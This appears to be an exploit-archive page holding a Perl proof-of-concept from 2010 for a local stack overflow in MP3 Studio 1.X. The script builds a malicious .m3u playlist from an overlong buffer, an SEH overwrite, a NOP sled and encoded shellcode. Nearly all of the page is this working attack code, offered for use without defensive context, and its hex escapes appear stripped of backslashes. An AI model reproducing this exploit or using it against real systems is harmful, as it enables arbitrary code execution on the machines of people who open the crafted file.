[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MP3 Studio v1.X (.m3u File) Local Stack Overflow (Universal)
# Published : 2010-01-20
# Author : D3V!L FUCKER
# Previous Title : Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit
# Next Title : jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
#!/usr/bin/perl
# Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow Universal
# Date: 01/20/2010
# Author: D3V!L FUCKER
# Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio
# Version: 1.X
# Tested on: Windows XP SP2 , SP3
# Greetz [2] : THE INJECTIOR , sarbot511 , Thrid Devil , germaya_x , his0k4
# www.v99x.com <<< W3 M!ss y0u :(
$buff = "http://"."x41" x 4103;
$SEH = "xebx1bx90x90";
$NEX_SEH = "x5Bx06x02x10";
$nob = "x90" x 22;
$sc =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47".
"x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32".
"x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a".
"x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e".
"x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54".
"x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64".
"x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f".
"x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f".
"x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d".
"x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44".
"x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35".
"x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a".
"x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b".
"x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57".
"x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b".
"x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63".
"x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59".
"x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73".
"x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63".
"x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33".
"x30x47";
open(myfile,'>>4bdull4h.m3u');
print myfile $buff.$SEH.$NEX_SEH.$nob.$sc;
close(myfile);